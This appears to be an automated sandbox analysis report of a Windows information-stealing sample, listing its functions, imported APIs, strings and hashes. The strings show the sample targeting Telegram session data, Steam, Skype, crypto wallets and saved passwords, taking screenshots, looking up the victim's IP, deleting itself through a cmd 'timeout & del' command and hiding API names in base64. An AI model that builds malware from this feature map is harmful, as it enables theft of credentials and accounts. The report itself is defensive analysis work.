Function 0040561C Relevance: 220.8, APIs: 63, Strings: 63, Instructions: 312
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00419155), ref: 0040562D
GetProcAddress.KERNEL32(00000000,ExpandEnvironmentStringsW), ref: 0040563C
GetProcAddress.KERNEL32(00000000,GetComputerNameW), ref: 0040564E
GetProcAddress.KERNEL32(00000000,GlobalMemoryStatus), ref: 00405660
GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 00405672
GetProcAddress.KERNEL32(00000000,GetFileSize), ref: 00405684
GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00405696
GetProcAddress.KERNEL32(00000000,ReadFile), ref: 004056A8
GetProcAddress.KERNEL32(00000000,GetFileAttributesW), ref: 004056BA
GetProcAddress.KERNEL32(00000000,CreateMutexA), ref: 004056CC
GetProcAddress.KERNEL32(00000000,ReleaseMutex), ref: 004056DE
GetProcAddress.KERNEL32(00000000,GetLastError), ref: 004056F0
GetProcAddress.KERNEL32(00000000,GetCurrentDirectoryW), ref: 00405702
GetProcAddress.KERNEL32(00000000,SetEnvironmentVariableW), ref: 00405714
GetProcAddress.KERNEL32(00000000,GetEnvironmentVariableW), ref: 00405726
GetProcAddress.KERNEL32(00000000,SetCurrentDirectoryW), ref: 00405738
GetProcAddress.KERNEL32(00000000,FindFirstFileW), ref: 0040574A
GetProcAddress.KERNEL32(00000000,FindNextFileW), ref: 0040575C
GetProcAddress.KERNEL32(00000000,LocalFree), ref: 0040576E
GetProcAddress.KERNEL32(00000000,GetTickCount), ref: 00405780
GetProcAddress.KERNEL32(00000000,CopyFileW), ref: 00405792
GetProcAddress.KERNEL32(00000000,FindClose), ref: 004057A4
GetProcAddress.KERNEL32(00000000,GlobalMemoryStatusEx), ref: 004057B6
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 004057C8
GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 004057DA
GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 004057EC
GetProcAddress.KERNEL32(00000000,GetModuleFileNameW), ref: 004057FE
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00405810
GetProcAddress.KERNEL32(00000000,GetLocaleInfoA), ref: 00405822
GetProcAddress.KERNEL32(00000000,GetLocalTime), ref: 00405834
GetProcAddress.KERNEL32(00000000,GetTimeZoneInformation), ref: 00405846
GetProcAddress.KERNEL32(00000000,RemoveDirectoryW), ref: 00405858
GetProcAddress.KERNEL32(00000000,DeleteFileW), ref: 0040586A
GetProcAddress.KERNEL32(00000000,GetLogicalDriveStringsA), ref: 0040587C
GetProcAddress.KERNEL32(00000000,GetDriveTypeA), ref: 0040588E
GetProcAddress.KERNEL32(00000000,CreateProcessW), ref: 004058A0
LoadLibraryA.KERNEL32(advapi32.dll,00000000,CreateProcessW,00000000,GetDriveTypeA,00000000,GetLogicalDriveStringsA,00000000,DeleteFileW,00000000,RemoveDirectoryW,00000000,GetTimeZoneInformation,00000000,GetLocalTime,00000000), ref: 004058AF
GetProcAddress.KERNEL32(00000000,GetUserNameW), ref: 004058BE
GetProcAddress.KERNEL32(00000000,RegCreateKeyExW), ref: 004058D0
GetProcAddress.KERNEL32(00000000,RegQueryValueExW), ref: 004058E2
GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 004058F4
GetProcAddress.KERNEL32(00000000,RegOpenKeyExW), ref: 00405906
GetProcAddress.KERNEL32(00000000,AllocateAndInitializeSid), ref: 00405918
GetProcAddress.KERNEL32(00000000,LookupAccountSidA), ref: 0040592A
GetProcAddress.KERNEL32(00000000,CreateProcessAsUserW), ref: 0040593C
GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0040594E
GetProcAddress.KERNEL32(00000000,RegOpenKeyW), ref: 00405960
GetProcAddress.KERNEL32(00000000,RegEnumKeyW), ref: 00405972
GetProcAddress.KERNEL32(00000000,RegEnumValueW), ref: 00405984
GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 00405996
GetProcAddress.KERNEL32(00000000,CryptCreateHash), ref: 004059A8
GetProcAddress.KERNEL32(00000000,CryptHashData), ref: 004059BA
GetProcAddress.KERNEL32(00000000,CryptGetHashParam), ref: 004059CC
GetProcAddress.KERNEL32(00000000,CryptDestroyHash), ref: 004059DE
GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 004059F0
LoadLibraryA.KERNEL32(user32.dll,00000000,CryptReleaseContext,00000000,CryptDestroyHash,00000000,CryptGetHashParam,00000000,CryptHashData,00000000,CryptCreateHash,00000000,CryptAcquireContextA,00000000,RegEnumValueW,00000000), ref: 004059FF
GetProcAddress.KERNEL32(76050000,EnumDisplayDevicesW), ref: 00405A14
GetProcAddress.KERNEL32(76050000,wvsprintfA), ref: 00405A29
GetProcAddress.KERNEL32(76050000,GetKeyboardLayoutList), ref: 00405A3E
LoadLibraryA.KERNEL32(shell32.dll,76050000,GetKeyboardLayoutList,76050000,wvsprintfA,76050000,EnumDisplayDevicesW,user32.dll,00000000,CryptReleaseContext,00000000,CryptDestroyHash,00000000,CryptGetHashParam,00000000,CryptHashData), ref: 00405A4D
GetProcAddress.KERNEL32(74EA0000,ShellExecuteExW), ref: 00405A62
LoadLibraryA.KERNEL32(ntdll.dll,74EA0000,ShellExecuteExW,shell32.dll,76050000,GetKeyboardLayoutList,76050000,wvsprintfA,76050000,EnumDisplayDevicesW,user32.dll,00000000,CryptReleaseContext,00000000,CryptDestroyHash,00000000), ref: 00405A71
GetProcAddress.KERNEL32(76EA0000,RtlComputeCrc32), ref: 00405A86

Strings

ExpandEnvironmentStringsW, xrefs: 00405634
CryptAcquireContextA, xrefs: 0040598E
DeleteFileW, xrefs: 00405862
CryptCreateHash, xrefs: 004059A0
CreateFileW, xrefs: 0040566A
kernel32.dll, xrefs: 00405628
GetLastError, xrefs: 004056E8
FindNextFileW, xrefs: 00405754
CryptGetHashParam, xrefs: 004059C4
GetLocalTime, xrefs: 0040582C
AllocateAndInitializeSid, xrefs: 00405910
RegCreateKeyExW, xrefs: 004058C8
FindClose, xrefs: 0040579C
RegEnumKeyW, xrefs: 0040596A
wvsprintfA, xrefs: 00405A1E
LookupAccountSidA, xrefs: 00405922
RegCloseKey, xrefs: 004058EC
RegEnumValueW, xrefs: 0040597C
CryptHashData, xrefs: 004059B2
RtlComputeCrc32, xrefs: 00405A7B
CreateMutexA, xrefs: 004056C4
LocalFree, xrefs: 00405766
Process32NextW, xrefs: 004057E4
GlobalMemoryStatusEx, xrefs: 004057AE
GetTimeZoneInformation, xrefs: 0040583E
GetEnvironmentVariableW, xrefs: 0040571E
RegQueryValueExW, xrefs: 004058DA
GetTickCount, xrefs: 00405778
ntdll.dll, xrefs: 00405A6C
GetFileAttributesW, xrefs: 004056B2
SetDllDirectoryW, xrefs: 00405808
CloseHandle, xrefs: 0040568E
GetUserNameW, xrefs: 004058B6
Process32FirstW, xrefs: 004057D2
GetModuleFileNameW, xrefs: 004057F6
GetKeyboardLayoutList, xrefs: 00405A33
CryptDestroyHash, xrefs: 004059D6
CryptReleaseContext, xrefs: 004059E8
ReadFile, xrefs: 004056A0
RemoveDirectoryW, xrefs: 00405850
CreateToolhelp32Snapshot, xrefs: 004057C0
RegOpenKeyExW, xrefs: 004058FE
SetCurrentDirectoryW, xrefs: 00405730
GetDriveTypeA, xrefs: 00405886
GetCurrentDirectoryW, xrefs: 004056FA
GetFileSize, xrefs: 0040567C
GetComputerNameW, xrefs: 00405646
GlobalMemoryStatus, xrefs: 00405658
RegOpenKeyW, xrefs: 00405958
FindFirstFileW, xrefs: 00405742
user32.dll, xrefs: 004059FA
advapi32.dll, xrefs: 004058AA
CheckTokenMembership, xrefs: 00405946
CreateProcessW, xrefs: 00405898
ShellExecuteExW, xrefs: 00405A57
ReleaseMutex, xrefs: 004056D6
GetLogicalDriveStringsA, xrefs: 00405874
CopyFileW, xrefs: 0040578A
EnumDisplayDevicesW, xrefs: 00405A09
CreateProcessAsUserW, xrefs: 00405934
SetEnvironmentVariableW, xrefs: 0040570C
shell32.dll, xrefs: 00405A48
GetLocaleInfoA, xrefs: 0040581A

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: AllocateAndInitializeSid$CheckTokenMembership$CloseHandle$CopyFileW$CreateFileW$CreateMutexA$CreateProcessAsUserW$CreateProcessW$CreateToolhelp32Snapshot$CryptAcquireContextA$CryptCreateHash$CryptDestroyHash$CryptGetHashParam$CryptHashData$CryptReleaseContext$DeleteFileW$EnumDisplayDevicesW$ExpandEnvironmentStringsW$FindClose$FindFirstFileW$FindNextFileW$GetComputerNameW$GetCurrentDirectoryW$GetDriveTypeA$GetEnvironmentVariableW$GetFileAttributesW$GetFileSize$GetKeyboardLayoutList$GetLastError$GetLocalTime$GetLocaleInfoA$GetLogicalDriveStringsA$GetModuleFileNameW$GetTickCount$GetTimeZoneInformation$GetUserNameW$GlobalMemoryStatus$GlobalMemoryStatusEx$LocalFree$LookupAccountSidA$Process32FirstW$Process32NextW$ReadFile$RegCloseKey$RegCreateKeyExW$RegEnumKeyW$RegEnumValueW$RegOpenKeyExW$RegOpenKeyW$RegQueryValueExW$ReleaseMutex$RemoveDirectoryW$RtlComputeCrc32$SetCurrentDirectoryW$SetDllDirectoryW$SetEnvironmentVariableW$ShellExecuteExW$advapi32.dll$kernel32.dll$ntdll.dll$shell32.dll$user32.dll$wvsprintfA
API String ID: 2238633743-617434850
Opcode ID: 8a7debf825173666d64633fefa6854a254c857d9de9e6bbb9cb681206d11099e
Instruction ID: cfd24dbd3a5623e96a1366eeff91a6eabf16f5ed4c2f56b33555d19b2fe062a0
Opcode Fuzzy Hash: 8a7debf825173666d64633fefa6854a254c857d9de9e6bbb9cb681206d11099e
Instruction Fuzzy Hash: AEC174B1A80710ABDB01EFA5DC8AA6A37A8FB45705360953BB544FF2D1D678DC018F9C

Function 00419108 Relevance: 58.7, APIs: 5, Strings: 28, Instructions: 964
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 00419195

Part of subcall function 00408328: CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D), ref: 004083C7
Part of subcall function 00408328: CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%appdata%\,00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D), ref: 00408435

GetSystemMetrics.USER32(00000001), ref: 00419460
GetSystemMetrics.USER32(00000000), ref: 00419468
ShellExecuteExW.SHELL32(0000003C,0041A4AC,?,?), ref: 00419F27
ExitProcess.KERNEL32(00000000), ref: 00419F2B

Strings

http://ip-api.com/json, xrefs: 0041988E
Skype, xrefs: 004193F8
GET, xrefs: 00419887
<, xrefs: 00419E1B
System.txt, xrefs: 00419938
Telegram, xrefs: 0041941B
Coins, xrefs: 004193CE
scr.jpg, xrefs: 00419475
D877F783D5*,map*, xrefs: 00419420
%DSK_, xrefs: 004194C5, 004194E2, 0041956B
image/jpeg, xrefs: 00419455
</d>, xrefs: 004192D7
</c>, xrefs: 00419279
%appdata%\Telegram Desktop\tdata\, xrefs: 00419425
Steam, xrefs: 0041943B
<n>, xrefs: 004192A8
PasswordsList.txt, xrefs: 00419368
</n>, xrefs: 004192A0
/c %WINDIR%\system32\timeout.exe 3 & del ", xrefs: 00419E66
"query":", xrefs: 004198A4
"countryCode":", xrefs: 004198BA
<c>, xrefs: 00419281
%comspec%, xrefs: 00419E45
0_@, xrefs: 00419CD7, 0041A0EA
<d>, xrefs: 004192DF
exit, xrefs: 00419262
ip.txt, xrefs: 004198E5, 004198F7
Files\, xrefs: 004196C6, 004197A1

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: Create$DirectoryMetricsSystem$ExecuteExitMutexProcessShell
String ID: "countryCode":"$"query":"$%DSK_$%appdata%\Telegram Desktop\tdata\$%comspec%$/c %WINDIR%\system32\timeout.exe 3 & del "$0_@$<$</c>$</d>$</n>$<c>$<d>$<n>$Coins$D877F783D5*,map*$Files\$GET$PasswordsList.txt$Skype$Steam$System.txt$Telegram$exit$http://ip-api.com/json$image/jpeg$ip.txt$scr.jpg
API String ID: 1646377131-805684967
Opcode ID: b0918735eb01c85f46bb61440219fdaacc2c7db3611cf1fcd55f505ef4f58d84
Instruction ID: 8e865d1d98f6c8efaf34d3e531d58462b667ba857a61b59ff422c1b99a10b1ba
Opcode Fuzzy Hash: b0918735eb01c85f46bb61440219fdaacc2c7db3611cf1fcd55f505ef4f58d84
Instruction Fuzzy Hash: 4F920E34A0011D9FDB11EB55C885BCDB7B9AF49308F5081BBE408B7292DB38AF958F59

Function 0040831C Relevance: 35.3, APIs: 17, Strings: 3, Instructions: 323
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D), ref: 004083C7
CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%appdata%\,00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D), ref: 00408435
SetCurrentDirectoryW.KERNEL32(00000000,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D,?,?,?,00000000), ref: 004084BB
LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D,?,?,?,00000000), ref: 004084E4
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040850D
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408530
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408553
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408576
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408599
GetProcAddress.KERNEL32(00000000,00000000), ref: 004085BC
GetProcAddress.KERNEL32(00000000,00000000), ref: 004085DF
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408602
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408625
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408648
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040866B
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040868E
GetProcAddress.KERNEL32(00000000,00000000), ref: 004086B1

Strings

PATH, xrefs: 00408448, 00408470, 0040849E
%appdata%\, xrefs: 004083FC
%TEMP%\, xrefs: 0040838E

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: AddressProc$Directory$Create$CurrentLibraryLoad
String ID: %TEMP%\$%appdata%\$PATH
API String ID: 1998666822-1089150275
Opcode ID: a3a7f0e04276fa5588cadaa871e822f5307a06622094e1642ca5e6744384a9c2
Instruction ID: 107c2c44d9e3562d342af0426f92bc8293728700e54ee15747b3200e896e575f
Opcode Fuzzy Hash: a3a7f0e04276fa5588cadaa871e822f5307a06622094e1642ca5e6744384a9c2
Instruction Fuzzy Hash: 08C12A709002059BDB01EBA9DD86BCE77B8EF49308F20457BB454BB2D6CB78AD05CB59

Function 00408324 Relevance: 35.3, APIs: 17, Strings: 3, Instructions: 319
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D), ref: 004083C7
CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%appdata%\,00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D), ref: 00408435
SetCurrentDirectoryW.KERNEL32(00000000,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D,?,?,?,00000000), ref: 004084BB
LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D,?,?,?,00000000), ref: 004084E4
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040850D
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408530
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408553
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408576
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408599
GetProcAddress.KERNEL32(00000000,00000000), ref: 004085BC
GetProcAddress.KERNEL32(00000000,00000000), ref: 004085DF
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408602
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408625
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408648
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040866B
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040868E
GetProcAddress.KERNEL32(00000000,00000000), ref: 004086B1

Strings

PATH, xrefs: 00408448, 00408470, 0040849E
%appdata%\, xrefs: 004083FC
%TEMP%\, xrefs: 0040838E

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: AddressProc$Directory$Create$CurrentLibraryLoad
String ID: %TEMP%\$%appdata%\$PATH
API String ID: 1998666822-1089150275
Opcode ID: edc18b18f8305dbdd9bd898c15c8e83ed7fbd3ebddb0e7f499efc5e89588ebce
Instruction ID: 2d8dd4a76802c8c05b7f9f6fb250e21a54e9375513618aa46567d80ce5eb0686
Opcode Fuzzy Hash: edc18b18f8305dbdd9bd898c15c8e83ed7fbd3ebddb0e7f499efc5e89588ebce
Instruction Fuzzy Hash: A7C12A70A002059BDB01EBA9DD86BCE77B8EF45308F20453BB454BB3D5CB78AD058B59

Function 00408328 Relevance: 35.3, APIs: 17, Strings: 3, Instructions: 317
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D), ref: 004083C7
CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%appdata%\,00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D), ref: 00408435
SetCurrentDirectoryW.KERNEL32(00000000,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D,?,?,?,00000000), ref: 004084BB
LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D,?,?,?,00000000), ref: 004084E4
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040850D
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408530
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408553
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408576
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408599
GetProcAddress.KERNEL32(00000000,00000000), ref: 004085BC
GetProcAddress.KERNEL32(00000000,00000000), ref: 004085DF
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408602
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408625
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408648
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040866B
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040868E
GetProcAddress.KERNEL32(00000000,00000000), ref: 004086B1

Strings

PATH, xrefs: 00408448, 00408470, 0040849E
%appdata%\, xrefs: 004083FC
%TEMP%\, xrefs: 0040838E

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: AddressProc$Directory$Create$CurrentLibraryLoad
String ID: %TEMP%\$%appdata%\$PATH
API String ID: 1998666822-1089150275
Opcode ID: 985e44c51c59e8ee6989f45de44698a0f141bfbbbf747e03c4d8817034f6fa2f
Instruction ID: f743aedec7dbf6b98949553c7d40f8bccc431f9c9a4af862cbdb08e619508236
Opcode Fuzzy Hash: 985e44c51c59e8ee6989f45de44698a0f141bfbbbf747e03c4d8817034f6fa2f
Instruction Fuzzy Hash: A0C11A70A002059BDB01EBA9DD86BCE77B8EF48309F20453BB454BB3D5DB78AD058B59

Function 00416B8C Relevance: 28.2, APIs: 11, Strings: 5, Instructions: 216
libraryloaderprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,), ref: 00416C04
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C0A
LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,), ref: 00416C32
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C38
LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2), ref: 00416C77
GetProcAddress.KERNEL32(00000000,00000000), ref: 00416C7D
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC), ref: 00416C90
Process32FirstW.KERNEL32(00000000,0000022C), ref: 00416CAF
Process32NextW.KERNEL32(00000000,?), ref: 00416D1E
CloseHandle.KERNEL32(00000000), ref: 00416D2C
GetCurrentProcessId.KERNEL32(?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,,?,Zone: ,?,004175A8), ref: 00416DAA

Strings

kernel32.dll, xrefs: 00416BFF, 00416C2D
UHJvY2VzczMyRmlyc3RX, xrefs: 00416C17
UHJvY2VzczMyTmV4dFc=, xrefs: 00416C45
Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90, xrefs: 00416BE9
a2VybmVsMzIuZGxs, xrefs: 00416C61

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc$Process32$CloseCreateCurrentFirstHandleNextProcessSnapshotToolhelp32
String ID: Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90$UHJvY2VzczMyRmlyc3RX$UHJvY2VzczMyTmV4dFc=$a2VybmVsMzIuZGxs$kernel32.dll
API String ID: 1927487376-4127804628
Opcode ID: 65300b4e60da800d415c1a3cb2551db00b88653df35aa2bd350cfea82b7b47e0
Instruction ID: f3c24ddc2a443a78fd4165323e7ca93df30f075cb4f00a4e444516d0c24f858d
Opcode Fuzzy Hash: 65300b4e60da800d415c1a3cb2551db00b88653df35aa2bd350cfea82b7b47e0
Instruction Fuzzy Hash: FB917570A006099BCB10EF69C985ADEB7B9FF84304F1181BAE509B7291D739DF858F58

Function 00416B90 Relevance: 28.2, APIs: 11, Strings: 5, Instructions: 214
libraryloaderprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,), ref: 00416C04
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C0A
LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,), ref: 00416C32
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C38
LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2), ref: 00416C77
GetProcAddress.KERNEL32(00000000,00000000), ref: 00416C7D
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC), ref: 00416C90
Process32FirstW.KERNEL32(00000000,0000022C), ref: 00416CAF
Process32NextW.KERNEL32(00000000,?), ref: 00416D1E
CloseHandle.KERNEL32(00000000), ref: 00416D2C
GetCurrentProcessId.KERNEL32(?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,,?,Zone: ,?,004175A8), ref: 00416DAA

Strings

kernel32.dll, xrefs: 00416BFF, 00416C2D
UHJvY2VzczMyRmlyc3RX, xrefs: 00416C17
UHJvY2VzczMyTmV4dFc=, xrefs: 00416C45
Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90, xrefs: 00416BE9
a2VybmVsMzIuZGxs, xrefs: 00416C61

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc$Process32$CloseCreateCurrentFirstHandleNextProcessSnapshotToolhelp32
String ID: Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90$UHJvY2VzczMyRmlyc3RX$UHJvY2VzczMyTmV4dFc=$a2VybmVsMzIuZGxs$kernel32.dll
API String ID: 1927487376-4127804628
Opcode ID: 23aed005d1cd924713a6c9523997cf456d4e38f9e5c7cc2fcb202ae1bcbd67cf
Instruction ID: fd76d8ed353255a1278cd755ee3df483ef4fe920b1e5afc451e9d1c12470fbd9
Opcode Fuzzy Hash: 23aed005d1cd924713a6c9523997cf456d4e38f9e5c7cc2fcb202ae1bcbd67cf
Instruction Fuzzy Hash: B2818570A006099BCB10EF69C985ADEB7B9FF84304F1181BAE509B7291D739DF858F58

Function 00417278 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 213
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemMetrics.USER32(00000000), ref: 004173D7
GetSystemMetrics.USER32(00000001), ref: 004173EE

Part of subcall function 00416FB8: GetLocaleInfoA.KERNEL32(?,00000059,?,00000100,?,-00000001,0041B0FC,?,?,00417429,Layouts: ,?,00417604,?,00000001,00417654), ref: 00417015

Part of subcall function 00417098: GetTimeZoneInformation.KERNEL32(?,00000000,00417170,?,-00000001,0041B0FC,?,?,0041746F,Zone: ,?,004175A8,?,LocalTime: ,?,004175A8), ref: 004170D6

Part of subcall function 00416748: GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C

Sleep.KERNEL32(00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ,?,004175A8,?,Layouts: ,?), ref: 004174A3

Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,), ref: 00416C04
Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C0A
Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,), ref: 00416C32
Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C38
Part of subcall function 00416B94: LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2), ref: 00416C77
Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,00000000), ref: 00416C7D
Part of subcall function 00416B94: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC), ref: 00416C90
Part of subcall function 00416B94: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00416CAF

Sleep.KERNEL32(00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ), ref: 004174CD
Sleep.KERNEL32(00000001,004175A8,[Soft],?,00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ), ref: 004174EC

Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00020019,0041A69E,00000000,00416452,?,-00000001,0041B0FC,?,00000000,00000000,?,004174F9,00000001), ref: 00415F8D
